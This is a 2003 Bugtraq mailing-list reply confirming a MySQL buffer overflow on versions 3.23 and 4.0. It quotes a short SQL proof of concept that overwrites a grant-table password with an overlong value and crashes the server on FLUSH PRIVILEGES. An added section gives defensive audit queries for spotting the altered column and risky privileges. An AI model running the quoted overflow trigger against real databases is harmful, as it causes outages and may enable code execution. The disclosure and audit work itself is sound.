Date: Thu, 11 Sep 2003 13:41:29 +0300
From: Konstantin Tsolov <ktsolov@...l.bg>
To: bugtraq@...urityfocus.com
Subject: Re: Buffer overflow in MySQL



managed to replicate on 4.0.13 (custom made) running on slack8.1 with
mysql.mysql.

3.23.51 (the distro mysql version) also proved vulnerable.

nb: just make sure you have a backup copy of your mysql db when testing this
harmless proof of concept on your production server :-)

> successful exploitation of that bug is trivial on some platforms. On most
> Linux systems the return address needs about 444 bytes to get overwritten.
>
>   Harmless proof of concept :
>   > USE mysql;
>   > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
>   > UPDATE User SET Password =
>
> '123456781234567812345678123456781234567812345678123456781234567812345678
>  123456781234567812345678123456781234567812345678123456781234567812345678
>  123456781234567812345678123456781234567812345678123456781234567812345678
>  12345678123456781234567812345678...' WHERE User = 'abcd';
>
>   > FLUSH PRIVILEGES;
>
>   [Connection lost]

-- 

"Talk is cheap because supply always exceeds demand."
		-- source unknown

+------------------------------------------------------+
| Konstantin Tsolov             ktsolov at etel dot bg |
| Systems Administrator - VoIP                         |
| eTel Ltd.                                www.etel.bg |
| Sofia, Bulgaria                                      |
+------------------------------------------------------+
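
Added example, not part of the original post or of the MySQL project: audit queries an administrator can run on a 3.23/4.0 server to look for the conditions the quoted proof of concept relies on, namely a widened `Password` column, an over-long stored value, and accounts able to modify the grant tables or reload them. The expected 16-character hash length is an assumption based on the pre-4.1 password format.

```sql
-- Added example: run as an administrative user on the server being audited.

-- 1. Column definition. Assumption: on 3.23/4.0 the stock type is a
--    16-character column; LONGTEXT or any wider type means the table
--    was altered, as in the quoted proof of concept.
SHOW COLUMNS FROM mysql.user LIKE 'Password';

-- 2. Stored values longer than the pre-4.1 hash length (assumed 16).
SELECT User, Host, LENGTH(Password) AS pw_len
  FROM mysql.user
 WHERE LENGTH(Password) > 16;

-- 3. Accounts with global rights to change or reload the grant tables.
--    ALTER and UPDATE are the statements used in the quoted test;
--    RELOAD is what FLUSH PRIVILEGES requires.
SELECT User, Host, Alter_priv, Update_priv, Reload_priv
  FROM mysql.user
 WHERE Alter_priv = 'Y' OR Update_priv = 'Y' OR Reload_priv = 'Y';

-- 4. Accounts with database-level rights that cover the mysql database.
--    Db values may contain wildcards, so review any pattern that
--    matches 'mysql', not only the literal name.
SELECT User, Host, Db, Alter_priv, Update_priv
  FROM mysql.db
 WHERE (Db = 'mysql' OR Db LIKE '%\%%' OR Db LIKE '%\_%')
   AND (Alter_priv = 'Y' OR Update_priv = 'Y');
```

Any row returned by query 2, or a non-default type in query 1, should be investigated before the next privilege reload or server restart.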


